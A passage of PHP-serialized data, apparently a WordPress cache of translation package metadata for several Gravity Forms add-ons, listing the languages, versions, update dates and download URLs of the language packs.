0:00\";s:12:\"english_name\";s:19:\"Norwegian (Bokmål)\";s:11:\"native_name\";s:13:\"Norsk bokmål\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformsbatchbook/gravityformsbatchbook-nb_NO.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nb\";i:1;s:3:\"nob\";}}s:2:\"pl\";a:7:{s:8:\"language\";s:5:\"pl_PL\";s:7:\"version\";s:3:\"1.3\";s:7:\"updated\";s:25:\"2023-01-06T08:02:47+00:00\";s:12:\"english_name\";s:6:\"Polish\";s:11:\"native_name\";s:6:\"Polski\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformsbatchbook/gravityformsbatchbook-pl_PL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pl\";i:1;s:3:\"pol\";}}s:5:\"pt-br\";a:7:{s:8:\"language\";s:5:\"pt_BR\";s:7:\"version\";s:3:\"1.3\";s:7:\"updated\";s:25:\"2023-01-06T08:02:49+00:00\";s:12:\"english_name\";s:19:\"Portuguese (Brazil)\";s:11:\"native_name\";s:20:\"Português do Brasil\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformsbatchbook/gravityformsbatchbook-pt_BR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pt\";i:1;s:3:\"por\";}}s:2:\"pt\";a:7:{s:8:\"language\";s:5:\"pt_PT\";s:7:\"version\";s:3:\"1.3\";s:7:\"updated\";s:25:\"2019-12-10T11:30:05+00:00\";s:12:\"english_name\";s:21:\"Portuguese (Portugal)\";s:11:\"native_name\";s:10:\"Português\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformsbatchbook/gravityformsbatchbook-pt_PT.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"pt\";}}s:2:\"ru\";a:7:{s:8:\"language\";s:5:\"ru_RU\";s:7:\"version\";s:3:\"1.3\";s:7:\"updated\";s:25:\"2019-12-10T11:30:11+00:00\";s:12:\"english_name\";s:7:\"Russian\";s:11:\"native_name\";s:14:\"Русский\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformsbatchbook/gravityformsbatchbook-ru_RU.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ru\";i:1;s:3:\"rus\";}}s:2:\"es\";a:7:{s:8:\"language\";s:5:\"es_ES\";s:7:\"version\";s:3:\"1.3\";s:7:\"updated\";s:25:\"2023-01-06T16:58:32+00:00\";s:12:\"english_name\";s:15:\"Spanish (Spain)\";s:11:\"native_name\";s:8:\"Español\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformsbatchbook/gravityformsbatchbook-es_ES.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"es\";i:1;s:3:\"spa\";i:2;s:3:\"spa\";}}s:2:\"sv\";a:7:{s:8:\"language\";s:5:\"sv_SE\";s:7:\"version\";s:3:\"1.3\";s:7:\"updated\";s:25:\"2020-10-21T18:08:50+00:00\";s:12:\"english_name\";s:7:\"Swedish\";s:11:\"native_name\";s:7:\"Svenska\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformsbatchbook/gravityformsbatchbook-sv_SE.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"sv\";i:1;s:3:\"swe\";}}s:2:\"tr\";a:7:{s:8:\"language\";s:5:\"tr_TR\";s:7:\"version\";s:3:\"1.3\";s:7:\"updated\";s:25:\"2023-01-06T08:02:59+00:00\";s:12:\"english_name\";s:7:\"Turkish\";s:11:\"native_name\";s:8:\"Türkçe\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformsbatchbook/gravityformsbatchbook-tr_TR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"tr\";i:1;s:3:\"tur\";}}s:2:\"uk\";a:7:{s:8:\"language\";s:2:\"uk\";s:7:\"version\";s:3:\"1.3\";s:7:\"updated\";s:25:\"2023-01-06T08:03:01+00:00\";s:12:\"english_name\";s:9:\"Ukrainian\";s:11:\"native_name\";s:20:\"Українська\";s:7:\"package\";s:102:\"https://packages.translationspress.com/rocketgenius/gravityformsbatchbook/gravityformsbatchbook-uk.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"uk\";i:1;s:3:\"ukr\";}}}}s:18:\"gravityformsbreeze\";a:1:{s:12:\"translations\";a:20:{s:2:\"ca\";a:7:{s:8:\"language\";s:2:\"ca\";s:7:\"version\";s:5:\"1.5.1\";s:7:\"updated\";s:25:\"2023-02-20T14:31:14+00:00\";s:12:\"english_name\";s:7:\"Catalan\";s:11:\"native_name\";s:7:\"Català\";s:7:\"package\";s:96:\"https://packages.translationspress.com/rocketgenius/gravityformsbreeze/gravityformsbreeze-ca.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ca\";i:1;s:3:\"cat\";}}s:2:\"da\";a:7:{s:8:\"language\";s:5:\"da_DK\";s:7:\"version\";s:5:\"1.5.1\";s:7:\"updated\";s:25:\"2022-06-23T19:13:22+00:00\";s:12:\"english_name\";s:6:\"Danish\";s:11:\"native_name\";s:5:\"Dansk\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformsbreeze/gravityformsbreeze-da_DK.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"da\";i:1;s:3:\"dan\";}}s:2:\"nl\";a:7:{s:8:\"language\";s:5:\"nl_NL\";s:7:\"version\";s:5:\"1.5.1\";s:7:\"updated\";s:25:\"2023-01-06T08:03:49+00:00\";s:12:\"english_name\";s:5:\"Dutch\";s:11:\"native_name\";s:10:\"Nederlands\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformsbreeze/gravityformsbreeze-nl_NL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nl\";i:1;s:3:\"nld\";}}s:5:\"en-au\";a:7:{s:8:\"language\";s:5:\"en_AU\";s:7:\"version\";s:5:\"1.5.1\";s:7:\"updated\";s:25:\"2022-06-27T08:34:12+00:00\";s:12:\"english_name\";s:19:\"English (Australia)\";s:11:\"native_name\";s:19:\"English (Australia)\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformsbreeze/gravityformsbreeze-en_AU.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:5:\"en-gb\";a:7:{s:8:\"language\";s:5:\"en_GB\";s:7:\"version\";s:5:\"1.5.1\";s:7:\"updated\";s:25:\"2022-03-15T13:30:44+00:00\";s:12:\"english_name\";s:12:\"English (UK)\";s:11:\"native_name\";s:12:\"English (UK)\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformsbreeze/gravityformsbreeze-en_GB.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:2:\"fi\";a:7:{s:8:\"language\";s:2:\"fi\";s:7:\"version\";s:5:\"1.5.1\";s:7:\"updated\";s:25:\"2022-06-23T19:13:42+00:00\";s:12:\"english_name\";s:7:\"Finnish\";s:11:\"native_name\";s:5:\"Suomi\";s:7:\"package\";s:96:\"https://packages.translationspress.com/rocketgenius/gravityformsbreeze/gravityformsbreeze-fi.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"fi\";i:1;s:3:\"fin\";}}s:2:\"fr\";a:7:{s:8:\"language\";s:5:\"fr_FR\";s:7:\"version\";s:5:\"1.5.1\";s:7:\"updated\";s:25:\"2020-10-21T11:51:14+00:00\";s:12:\"english_name\";s:15:\"French (France)\";s:11:\"native_name\";s:9:\"Français\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformsbreeze/gravityformsbreeze-fr_FR.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"fr\";}}s:2:\"de\";a:7:{s:8:\"language\";s:5:\"de_DE\";s:7:\"version\";s:5:\"1.5.1\";s:7:\"updated\";s:25:\"2023-01-06T16:59:26+00:00\";s:12:\"english_name\";s:6:\"German\";s:11:\"native_name\";s:7:\"Deutsch\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformsbreeze/gravityformsbreeze-de_DE.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"de\";}}s:2:\"he\";a:7:{s:8:\"language\";s:5:\"he_IL\";s:7:\"version\";s:5:\"1.5.1\";s:7:\"updated\";s:25:\"2023-01-06T16:59:43+00:00\";s:12:\"english_name\";s:6:\"Hebrew\";s:11:\"native_name\";s:16:\"עִבְרִית\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformsbreeze/gravityformsbreeze-he_IL.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"he\";}}s:2:\"hi\";a:7:{s:8:\"language\";s:5:\"hi_IN\";s:7:\"version\";s:5:\"1.5.1\";s:7:\"updated\";s:25:\"2020-10-27T15:24:22+00:00\";s:12:\"english_name\";s:5:\"Hindi\";s:11:\"native_name\";s:18:\"हिन्दी\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformsbreeze/gravityformsbreeze-hi_IN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"hi\";i:1;s:3:\"hin\";}}s:2:\"it\";a:7:{s:8:\"language\";s:5:\"it_IT\";s:7:\"version\";s:5:\"1.5.1\";s:7:\"updated\";s:25:\"2020-11-04T15:55:14+00:00\";s:12:\"english_name\";s:7:\"Italian\";s:11:\"native_name\";s:8:\"Italiano\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformsbreeze/gravityformsbreeze-it_IT.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"it\";i:1;s:3:\"ita\";}}s:2:\"ja\";a:7:{s:8:\"language\";s:2:\"ja\";s:7:\"version\";s:5:\"1.5.1\";s:7:\"updated\";s:25:\"2023-03-14T17:41:59+00:00\";s:12:\"english_name\";s:8:\"Japanese\";s:11:\"native_name\";s:9:\"日本語\";s:7:\"package\";s:96:\"https://packages.translationspress.com/rocketgenius/gravityformsbreeze/gravityformsbreeze-ja.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"ja\";}}s:2:\"pl\";a:7:{s:8:\"language\";s:5:\"pl_PL\";s:7:\"version\";s:5:\"1.5.1\";s:7:\"updated\";s:25:\"2023-01-06T08:03:51+00:00\";s:12:\"english_name\";s:6:\"Polish\";s:11:\"native_name\";s:6:\"Polski\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformsbreeze/gravityformsbreeze-pl_PL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pl\";i:1;s:3:\"pol\";}}s:5:\"pt-br\";a:7:{s:8:\"language\";s:5:\"pt_BR\";s:7:\"version\";s:5:\"1.5.1\";s:7:\"updated\";s:25:\"2023-01-06T08:03:53+00:00\";s:12:\"english_name\";s:19:\"Portuguese (Brazil)\";s:11:\"native_name\";s:20:\"Português do Brasil\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformsbreeze/gravityformsbreeze-pt_BR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pt\";i:1;s:3:\"por\";}}s:2:\"pt\";a:7:{s:8:\"language\";s:5:\"pt_PT\";s:7:\"version\";s:5:\"1.5.1\";s:7:\"updated\";s:25:\"2020-12-17T15:54:19+00:00\";s:12:\"english_name\";s:21:\"Portuguese (Portugal)\";s:11:\"native_name\";s:10:\"Português\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformsbreeze/gravityformsbreeze-pt_PT.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"pt\";}}s:2:\"ru\";a:7:{s:8:\"language\";s:5:\"ru_RU\";s:7:\"version\";s:5:\"1.5.1\";s:7:\"updated\";s:25:\"2020-11-04T15:53:05+00:00\";s:12:\"english_name\";s:7:\"Russian\";s:11:\"native_name\";s:14:\"Русский\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformsbreeze/gravityformsbreeze-ru_RU.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ru\";i:1;s:3:\"rus\";}}s:2:\"es\";a:7:{s:8:\"language\";s:5:\"es_ES\";s:7:\"version\";s:5:\"1.5.1\";s:7:\"updated\";s:25:\"2023-01-06T16:59:34+00:00\";s:12:\"english_name\";s:15:\"Spanish (Spain)\";s:11:\"native_name\";s:8:\"Español\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformsbreeze/gravityformsbreeze-es_ES.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"es\";i:1;s:3:\"spa\";i:2;s:3:\"spa\";}}s:2:\"sv\";a:7:{s:8:\"language\";s:5:\"sv_SE\";s:7:\"version\";s:5:\"1.5.1\";s:7:\"updated\";s:25:\"2020-10-21T18:01:43+00:00\";s:12:\"english_name\";s:7:\"Swedish\";s:11:\"native_name\";s:7:\"Svenska\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformsbreeze/gravityformsbreeze-sv_SE.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"sv\";i:1;s:3:\"swe\";}}s:2:\"tr\";a:7:{s:8:\"language\";s:5:\"tr_TR\";s:7:\"version\";s:5:\"1.5.1\";s:7:\"updated\";s:25:\"2020-11-05T09:41:54+00:00\";s:12:\"english_name\";s:7:\"Turkish\";s:11:\"native_name\";s:8:\"Türkçe\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformsbreeze/gravityformsbreeze-tr_TR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"tr\";i:1;s:3:\"tur\";}}s:2:\"uk\";a:7:{s:8:\"language\";s:2:\"uk\";s:7:\"version\";s:5:\"1.5.1\";s:7:\"updated\";s:25:\"2022-06-27T08:36:50+00:00\";s:12:\"english_name\";s:9:\"Ukrainian\";s:11:\"native_name\";s:20:\"Українська\";s:7:\"package\";s:96:\"https://packages.translationspress.com/rocketgenius/gravityformsbreeze/gravityformsbreeze-uk.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"uk\";i:1;s:3:\"ukr\";}}}}s:27:\"gravityformscampaignmonitor\";a:1:{s:12:\"translations\";a:20:{s:2:\"ca\";a:7:{s:8:\"language\";s:2:\"ca\";s:7:\"version\";s:5:\"3.9.1\";s:7:\"updated\";s:25:\"2023-02-20T14:31:14+00:00\";s:12:\"english_name\";s:7:\"Catalan\";s:11:\"native_name\";s:7:\"Català\";s:7:\"package\";s:114:\"https://packages.translationspress.com/rocketgenius/gravityformscampaignmonitor/gravityformscampaignmonitor-ca.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ca\";i:1;s:3:\"cat\";}}s:2:\"da\";a:7:{s:8:\"language\";s:5:\"da_DK\";s:7:\"version\";s:5:\"3.9.1\";s:7:\"updated\";s:25:\"2023-01-06T17:00:29+00:00\";s:12:\"english_name\";s:6:\"Danish\";s:11:\"native_name\";s:5:\"Dansk\";s:7:\"package\";s:117:\"https://packages.translationspress.com/rocketgenius/gravityformscampaignmonitor/gravityformscampaignmonitor-da_DK.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"da\";i:1;s:3:\"dan\";}}s:2:\"nl\";a:7:{s:8:\"language\";s:5:\"nl_NL\";s:7:\"version\";s:5:\"3.9.1\";s:7:\"updated\";s:25:\"2020-10-27T15:32:30+00:00\";s:12:\"english_name\";s:5:\"Dutch\";s:11:\"native_name\";s:10:\"Nederlands\";s:7:\"package\";s:117:\"https://packages.translationspress.com/rocketgenius/gravityformscampaignmonitor/gravityformscampaignmonitor-nl_NL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nl\";i:1;s:3:\"nld\";}}s:5:\"en-au\";a:7:{s:8:\"language\";s:5:\"en_AU\";s:7:\"version\";s:5:\"3.9.1\";s:7:\"updated\";s:25:\"2022-06-27T08:34:12+00:00\";s:12:\"english_name\";s:19:\"English (Australia)\";s:11:\"native_name\";s:19:\"English (Australia)\";s:7:\"package\";s:117:\"https://packages.translationspress.com/rocketgenius/gravityformscampaignmonitor/gravityformscampaignmonitor-en_AU.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:5:\"en-gb\";a:7:{s:8:\"language\";s:5:\"en_GB\";s:7:\"version\";s:5:\"3.9.1\";s:7:\"updated\";s:25:\"2022-03-15T13:30:44+00:00\";s:12:\"english_name\";s:12:\"English (UK)\";s:11:\"native_name\";s:12:\"English (UK)\";s:7:\"package\";s:117:\"https://packages.translationspress.com/rocketgenius/gravityformscampaignmonitor/gravityformscampaignmonitor-en_GB.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:2:\"fi\";a:7:{s:8:\"language\";s:2:\"fi\";s:7:\"version\";s:5:\"3.9.1\";s:7:\"updated\";s:25:\"2023-01-06T17:00:49+00:00\";s:12:\"english_name\";s:7:\"Finnish\";s:11:\"native_name\";s:5:\"Suomi\";s:7:\"package\";s:114:\"https://packages.translationspress.com/rocketgenius/gravityformscampaignmonitor/gravityformscampaignmonitor-fi.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"fi\";i:1;s:3:\"fin\";}}s:2:\"fr\";a:7:{s:8:\"language\";s:5:\"fr_FR\";s:7:\"version\";s:5:\"3.9.1\";s:7:\"updated\";s:25:\"2020-10-21T13:33:21+00:00\";s:12:\"english_name\";s:15:\"French (France)\";s:11:\"native_name\";s:9:\"Français\";s:7:\"package\";s:117:\"https://packages.translationspress.com/rocketgenius/gravityformscampaignmonitor/gravityformscampaignmonitor-fr_FR.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"fr\";}}s:2:\"de\";a:7:{s:8:\"language\";s:5:\"de_DE\";s:7:\"version\";s:5:\"3.9.1\";s:7:\"updated\";s:25:\"2023-01-06T17:00:34+00:00\";s:12:\"english_name\";s:6:\"German\";s:11:\"native_name\";s:7:\"Deutsch\";s:7:\"package\";s:117:\"https://packages.translationspress.com/rocketgenius/gravityformscampaignmonitor/gravityformscampaignmonitor-de_DE.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"de\";}}s:2:\"he\";a:7:{s:8:\"language\";s:5:\"he_IL\";s:7:\"version\";s:5:\"3.9.1\";s:7:\"updated\";s:25:\"2020-10-27T15:32:58+00:00\";s:12:\"english_name\";s:6:\"Hebrew\";s:11:\"native_name\";s:16:\"עִבְרִית\";s:7:\"package\";s:117:\"https://packages.translationspress.com/rocketgenius/gravityformscampaignmonitor/gravityformscampaignmonitor-he_IL.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"he\";}}s:2:\"hi\";a:7:{s:8:\"language\";s:5:\"hi_IN\";s:7:\"version\";s:5:\"3.9.1\";s:7:\"updated\";s:25:\"2023-01-06T17:00:57+00:00\";s:12:\"english_name\";s:5:\"Hindi\";s:11:\"native_name\";s:18:\"हिन्दी\";s:7:\"package\";s:117:\"https://packages.translationspress.com/rocketgenius/gravityformscampaignmonitor/gravityformscampaignmonitor-hi_IN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"hi\";i:1;s:3:\"hin\";}}s:2:\"it\";a:7:{s:8:\"language\";s:5:\"it_IT\";s:7:\"version\";s:5:\"3.9.1\";s:7:\"updated\";s:25:\"2023-01-06T17:01:03+00:00\";s:12:\"english_name\";s:7:\"Italian\";s:11:\"native_name\";s:8:\"Italiano\";s:7:\"package\";s:117:\"https://packages.translationspress.com/rocketgenius/gravityformscampaignmonitor/gravityformscampaignmonitor-it_IT.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"it\";i:1;s:3:\"ita\";}}s:2:\"ja\";a:7:{s:8:\"language\";s:2:\"ja\";s:7:\"version\";s:5:\"3.9.1\";s:7:\"updated\";s:25:\"2023-03-14T17:42:45+00:00\";s:12:\"english_name\";s:8:\"Japanese\";s:11:\"native_name\";s:9:\"日本語\";s:7:\"package\";s:114:\"https://packages.translationspress.com/rocketgenius/gravityformscampaignmonitor/gravityformscampaignmonitor-ja.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"ja\";}}s:2:\"pl\";a:7:{s:8:\"language\";s:5:\"pl_PL\";s:7:\"version\";s:5:\"3.9.1\";s:7:\"updated\";s:25:\"2023-01-06T17:01:15+00:00\";s:12:\"english_name\";s:6:\"Polish\";s:11:\"native_name\";s:6:\"Polski\";s:7:\"package\";s:117:\"https://packages.translationspress.com/rocketgenius/gravityformscampaignmonitor/gravityformscampaignmonitor-pl_PL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pl\";i:1;s:3:\"pol\";}}s:5:\"pt-br\";a:7:{s:8:\"language\";s:5:\"pt_BR\";s:7:\"version\";s:5:\"3.9.1\";s:7:\"updated\";s:25:\"2023-01-06T17:01:17+00:00\";s:12:\"english_name\";s:19:\"Portuguese (Brazil)\";s:11:\"native_name\";s:20:\"Português do Brasil\";s:7:\"package\";s:117:\"https://packages.translationspress.com/rocketgenius/gravityformscampaignmonitor/gravityformscampaignmonitor-pt_BR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pt\";i:1;s:3:\"por\";}}s:2:\"pt\";a:7:{s:8:\"language\";s:5:\"pt_PT\";s:7:\"version\";s:5:\"3.9.1\";s:7:\"updated\";s:25:\"2020-12-17T15:54:37+00:00\";s:12:\"english_name\";s:21:\"Portuguese (Portugal)\";s:11:\"native_name\";s:10:\"Português\";s:7:\"package\";s:117:\"https://packages.translationspress.com/rocketgenius/gravityformscampaignmonitor/gravityformscampaignmonitor-pt_PT.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"pt\";}}s:2:\"ru\";a:7:{s:8:\"language\";s:5:\"ru_RU\";s:7:\"version\";s:5:\"3.9.1\";s:7:\"updated\";s:25:\"2020-11-04T16:34:37+00:00\";s:12:\"english_name\";s:7:\"Russian\";s:11:\"native_name\";s:14:\"Русский\";s:7:\"package\";s:117:\"https://packages.translationspress.com/rocketgenius/gravityformscampaignmonitor/gravityformscampaignmonitor-ru_RU.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ru\";i:1;s:3:\"rus\";}}s:2:\"es\";a:7:{s:8:\"language\";s:5:\"es_ES\";s:7:\"version\";s:5:\"3.9.1\";s:7:\"updated\";s:25:\"2023-01-06T17:00:45+00:00\";s:12:\"english_name\";s:15:\"Spanish (Spain)\";s:11:\"native_name\";s:8:\"Español\";s:7:\"package\";s:117:\"https://packages.translationspress.com/rocketgenius/gravityformscampaignmonitor/gravityformscampaignmonitor-es_ES.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"es\";i:1;s:3:\"spa\";i:2;s:3:\"spa\";}}s:2:\"sv\";a:7:{s:8:\"language\";s:5:\"sv_SE\";s:7:\"version\";s:5:\"3.9.1\";s:7:\"updated\";s:25:\"2023-01-06T17:01:27+00:00\";s:12:\"english_name\";s:7:\"Swedish\";s:11:\"native_name\";s:7:\"Svenska\";s:7:\"package\";s:117:\"https://packages.translationspress.com/rocketgenius/gravityformscampaignmonitor/gravityformscampaignmonitor-sv_SE.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"sv\";i:1;s:3:\"swe\";}}s:2:\"tr\";a:7:{s:8:\"language\";s:5:\"tr_TR\";s:7:\"version\";s:5:\"3.9.1\";s:7:\"updated\";s:25:\"2023-01-06T17:01:29+00:00\";s:12:\"english_name\";s:7:\"Turkish\";s:11:\"native_name\";s:8:\"Türkçe\";s:7:\"package\";s:117:\"https://packages.translationspress.com/rocketgenius/gravityformscampaignmonitor/gravityformscampaignmonitor-tr_TR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"tr\";i:1;s:3:\"tur\";}}s:2:\"uk\";a:7:{s:8:\"language\";s:2:\"uk\";s:7:\"version\";s:5:\"3.9.1\";s:7:\"updated\";s:25:\"2022-06-27T08:43:40+00:00\";s:12:\"english_name\";s:9:\"Ukrainian\";s:11:\"native_name\";s:20:\"Українська\";s:7:\"package\";s:114:\"https://packages.translationspress.com/rocketgenius/gravityformscampaignmonitor/gravityformscampaignmonitor-uk.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"uk\";i:1;s:3:\"ukr\";}}}}s:20:\"gravityformscampfire\";a:1:{s:12:\"translations\";a:20:{s:2:\"ca\";a:7:{s:8:\"language\";s:2:\"ca\";s:7:\"version\";s:5:\"1.2.2\";s:7:\"updated\";s:25:\"2019-12-10T11:43:21+00:00\";s:12:\"english_name\";s:7:\"Catalan\";s:11:\"native_name\";s:7:\"Català\";s:7:\"package\";s:100:\"https://packages.translationspress.com/rocketgenius/gravityformscampfire/gravityformscampfire-ca.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ca\";i:1;s:3:\"cat\";}}s:5:\"zh-cn\";a:7:{s:8:\"language\";s:5:\"zh_CN\";s:7:\"version\";s:5:\"1.2.2\";s:7:\"updated\";s:25:\"2023-01-06T17:02:39+00:00\";s:12:\"english_name\";s:15:\"Chinese (China)\";s:11:\"native_name\";s:12:\"简体中文\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformscampfire/gravityformscampfire-zh_CN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"zh\";i:1;s:3:\"zho\";}}s:2:\"da\";a:7:{s:8:\"language\";s:5:\"da_DK\";s:7:\"version\";s:5:\"1.2.2\";s:7:\"updated\";s:25:\"2023-01-06T17:01:41+00:00\";s:12:\"english_name\";s:6:\"Danish\";s:11:\"native_name\";s:5:\"Dansk\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformscampfire/gravityformscampfire-da_DK.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"da\";i:1;s:3:\"dan\";}}s:2:\"nl\";a:7:{s:8:\"language\";s:5:\"nl_NL\";s:7:\"version\";s:5:\"1.2.2\";s:7:\"updated\";s:25:\"2019-12-10T11:43:51+00:00\";s:12:\"english_name\";s:5:\"Dutch\";s:11:\"native_name\";s:10:\"Nederlands\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformscampfire/gravityformscampfire-nl_NL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nl\";i:1;s:3:\"nld\";}}s:5:\"en-au\";a:7:{s:8:\"language\";s:5:\"en_AU\";s:7:\"version\";s:5:\"1.2.2\";s:7:\"updated\";s:25:\"2019-12-10T11:43:30+00:00\";s:12:\"english_name\";s:19:\"English (Australia)\";s:11:\"native_name\";s:19:\"English (Australia)\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformscampfire/gravityformscampfire-en_AU.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:5:\"en-gb\";a:7:{s:8:\"language\";s:5:\"en_GB\";s:7:\"version\";s:5:\"1.2.2\";s:7:\"updated\";s:25:\"2019-12-10T11:43:34+00:00\";s:12:\"english_name\";s:12:\"English (UK)\";s:11:\"native_name\";s:12:\"English (UK)\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformscampfire/gravityformscampfire-en_GB.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:2:\"fi\";a:7:{s:8:\"language\";s:2:\"fi\";s:7:\"version\";s:5:\"1.2.2\";s:7:\"updated\";s:25:\"2022-06-27T09:53:41+00:00\";s:12:\"english_name\";s:7:\"Finnish\";s:11:\"native_name\";s:5:\"Suomi\";s:7:\"package\";s:100:\"https://packages.translationspress.com/rocketgenius/gravityformscampfire/gravityformscampfire-fi.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"fi\";i:1;s:3:\"fin\";}}s:2:\"fr\";a:7:{s:8:\"language\";s:5:\"fr_FR\";s:7:\"version\";s:5:\"1.2.2\";s:7:\"updated\";s:25:\"2019-12-10T11:43:43+00:00\";s:12:\"english_name\";s:15:\"French (France)\";s:11:\"native_name\";s:9:\"Français\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformscampfire/gravityformscampfire-fr_FR.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"fr\";}}s:2:\"de\";a:7:{s:8:\"language\";s:5:\"de_DE\";s:7:\"version\";s:5:\"1.2.2\";s:7:\"updated\";s:25:\"2023-01-06T17:01:45+00:00\";s:12:\"english_name\";s:6:\"German\";s:11:\"native_name\";s:7:\"Deutsch\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformscampfire/gravityformscampfire-de_DE.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"de\";}}s:2:\"he\";a:7:{s:8:\"language\";s:5:\"he_IL\";s:7:\"version\";s:5:\"1.2.2\";s:7:\"updated\";s:25:\"2020-02-18T11:26:09+00:00\";s:12:\"english_name\";s:6:\"Hebrew\";s:11:\"native_name\";s:16:\"עִבְרִית\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformscampfire/gravityformscampfire-he_IL.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"he\";}}s:2:\"hi\";a:7:{s:8:\"language\";s:5:\"hi_IN\";s:7:\"version\";s:5:\"1.2.2\";s:7:\"updated\";s:25:\"2020-01-22T16:22:19+00:00\";s:12:\"english_name\";s:5:\"Hindi\";s:11:\"native_name\";s:18:\"हिन्दी\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformscampfire/gravityformscampfire-hi_IN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"hi\";i:1;s:3:\"hin\";}}s:2:\"it\";a:7:{s:8:\"language\";s:5:\"it_IT\";s:7:\"version\";s:5:\"1.2.2\";s:7:\"updated\";s:25:\"2019-12-10T11:43:47+00:00\";s:12:\"english_name\";s: